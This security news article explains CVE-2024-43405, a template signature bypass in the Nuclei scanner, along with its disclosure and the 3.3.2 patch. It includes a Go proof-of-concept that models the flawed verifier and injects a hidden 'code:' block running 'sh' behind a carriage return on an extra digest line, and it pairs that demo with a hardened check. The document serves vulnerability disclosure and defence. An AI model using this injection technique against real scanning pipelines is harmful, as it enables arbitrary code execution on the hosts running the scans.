A security vulnerability has been identified in ProjectDiscovery’s Nuclei, a widely used open-source vulnerability scanner. The flaw lets an attacker bypass the signature check that is supposed to protect templates and, through a crafted template, execute arbitrary code on the host running the scanner.
The vulnerability, tracked as CVE-2024-43405, carries a CVSS score of 7.4 out of 10 (high severity). It affects every Nuclei release from 3.0.0 up to and including 3.3.1, that is, the whole 3.x line before the fix, which puts a broad range of users in scope.
According to reports, the issue arises from an inconsistency in how newline characters are handled: the regex used for signature verification and the YAML parser that loads the template disagree about where a line ends. A detailed analysis describes how this lets malicious content be injected into a template while the signature over the innocuous part of the template still verifies.
Nuclei, designed to detect vulnerabilities across modern applications, cloud infrastructure, and networks, is driven by templates: structured YAML files that describe the requests to send and the responses that indicate a weakness. Its code protocol goes further and lets a template run local code on the machine executing the scan, which makes the integrity of templates a direct code-execution concern rather than a cosmetic one.
Wiz, a cloud security company that uncovered CVE-2024-43405, attributed the vulnerability to flaws in the template signature verification process. This process is crucial for maintaining the integrity of templates pulled from the official repository.
Exploiting this flaw allows attackers to bypass this essential verification, enabling them to create malicious templates capable of executing arbitrary code and accessing sensitive data from the affected systems. Wiz researcher Guy Goldenberg noted that this signature verification is currently the sole method for validating Nuclei templates, positioning it as a potential single point of failure.
The root of the problem is a mismatch between the regex used for signature validation and the YAML parser. In Go’s regex syntax, the pattern that locates a “# digest:” line runs to the next “\n” and treats a bare “\r” as an ordinary character, so everything after a “\r” still belongs to the same comment line as far as the verifier is concerned. The YAML parser, by contrast, treats “\r” as a line break. An attacker can therefore craft a template with more than one “# digest:” line and hide malicious YAML behind a “\r” on one of them: the verifier strips that entire line before checking the signature, while the parser splits it and loads the hidden content as real template data.
Importantly, only the first “# digest:” line supplies the signature that is checked; every later “# digest:” line is simply removed from the content before verification, and whatever follows a “\r” on such a line is removed with it. Those lines are never verified, but the YAML parser still processes them, so a hidden code block can execute with a signature that was never computed over it.
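The following Go program is an added illustration of the mismatch described above; it is not code from Nuclei or from the Wiz write-up. It models the pre-fix verifier with a regex of the same shape as the one discussed (an assumption, not a copy of the project’s source), stands in HMAC-SHA256 for Nuclei’s real public-key signature (the bypass does not depend on the algorithm), and uses a small line splitter in place of the YAML parser to show which lines the parser would see. The template text, key and injected “code” block are constructed for the demonstration; the hardened variant normalizes line breaks before verifying and is an illustrative fix, not the patch shipped in 3.3.2.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// reDigest follows the shape of the pre-3.3.2 nuclei pattern (an assumption
// drawn from the write-up, not copied from the project). (?m) anchors ^ and $
// to lines, but in Go's RE2 syntax "." matches every byte except "\n", so a
// bare "\r" and whatever follows it stay inside the same digest match.
var reDigest = regexp.MustCompile(`(?m)^#\sdigest:\s.+$`)

// signedView returns the bytes the signature covers: every regex-matched
// digest line is stripped first, then the result is trimmed.
func signedView(tmpl []byte) []byte {
	return bytes.TrimSpace(reDigest.ReplaceAll(tmpl, nil))
}

// firstDigest returns the value on the first digest line ("" if unsigned).
// Only this line supplies the signature; later digest lines are just removed.
func firstDigest(tmpl []byte) string {
	m := reDigest.Find(tmpl)
	if m == nil {
		return ""
	}
	return strings.TrimSpace(strings.TrimPrefix(string(m), "# digest:"))
}

// normalizeBreaks rewrites the three line breaks a YAML scanner accepts
// ("\r\n", "\r", "\n") to "\n", which is how the parser sees the document.
func normalizeBreaks(tmpl []byte) []byte {
	tmpl = bytes.ReplaceAll(tmpl, []byte("\r\n"), []byte("\n"))
	return bytes.ReplaceAll(tmpl, []byte("\r"), []byte("\n"))
}

// yamlLines is a stand-in for the parser's line splitting, not a YAML parser.
func yamlLines(tmpl []byte) []string {
	return strings.Split(string(normalizeBreaks(tmpl)), "\n")
}

// sign appends a digest line over signedView(tmpl). HMAC-SHA256 stands in
// for nuclei's public-key signature; the bypass is independent of the scheme.
func sign(key, tmpl []byte) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write(signedView(tmpl))
	line := "# digest: " + hex.EncodeToString(mac.Sum(nil)) + "\n"
	return append(append([]byte(nil), tmpl...), line...)
}

// verify is the vulnerable check: signature taken from the first digest line,
// content checked with all regex-matched digest lines removed.
func verify(key, tmpl []byte) bool {
	want, err := hex.DecodeString(firstDigest(tmpl))
	if err != nil {
		return false
	}
	mac := hmac.New(sha256.New, key)
	mac.Write(signedView(tmpl))
	return hmac.Equal(want, mac.Sum(nil))
}

// hardenedVerify makes the verifier see the same lines as the parser by
// normalizing breaks first. Illustrative fix, not the code shipped in 3.3.2.
func hardenedVerify(key, tmpl []byte) bool {
	return verify(key, normalizeBreaks(tmpl))
}

// injectAfterCR appends a second digest line whose "\r" hides a code block:
// the regex strips the whole line before checking, the parser reads five lines.
func injectAfterCR(signed []byte) []byte {
	payload := "# digest: x\rcode:\r  - engine:\r      - sh\r    source: id\n"
	return append(append([]byte(nil), signed...), payload...)
}

// legitTemplate is a constructed sample, not a real nuclei template.
var legitTemplate = []byte("id: sample-check\ninfo:\n  name: Sample check\n  severity: info\n" +
	"http:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n")

func main() {
	key := []byte("demo-signing-key") // stand-in for real key material
	signed := sign(key, legitTemplate)
	evil := injectAfterCR(signed)
	fmt.Println("signed template verifies:", verify(key, signed))
	fmt.Println("tampered template verifies (bypass):", verify(key, evil))
	fmt.Println("tampered template, hardened check:", hardenedVerify(key, evil))
	for _, l := range yamlLines(evil) {
		if strings.HasPrefix(l, "code:") || strings.HasPrefix(l, "    source:") {
			fmt.Println("parser sees:", l)
		}
	}
}
```

Running it shows the tampered template passing the vulnerable check with the original signature while the line splitter reports a top-level “code:” key and a “source: id” line, and the hardened check rejecting it once the verifier and the parser agree on what a line is. Note that a real fix has to apply the same normalization at signing time, or any template that legitimately contains “\r” would fail to verify after the change.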
After a responsible disclosure period, ProjectDiscovery addressed the vulnerability on September 4, 2024, with the release of version 3.3.2. At the time of writing the latest version of Nuclei is 3.3.7, and users are strongly encouraged to update to 3.3.2 or later to close the bypass.
Goldenberg cautions that the vulnerability is most likely to be exploited where organizations run unverified or community-contributed templates without adequate safeguards. In that setting an attacker who can get a template into the scan can obtain arbitrary command execution or exfiltrate data from the host running Nuclei. In practice, any pipeline that feeds Nuclei templates it did not author or pin should be treated as a code-execution surface until the scanner is upgraded.
The incident underscores that a vulnerability scanner is itself a piece of software that consumes untrusted input, and that template validation and the integrity of the template supply chain deserve the same scrutiny as the systems being scanned. Security teams should track the versions of their scanning tools and keep them patched as they would any other component exposed to third-party content.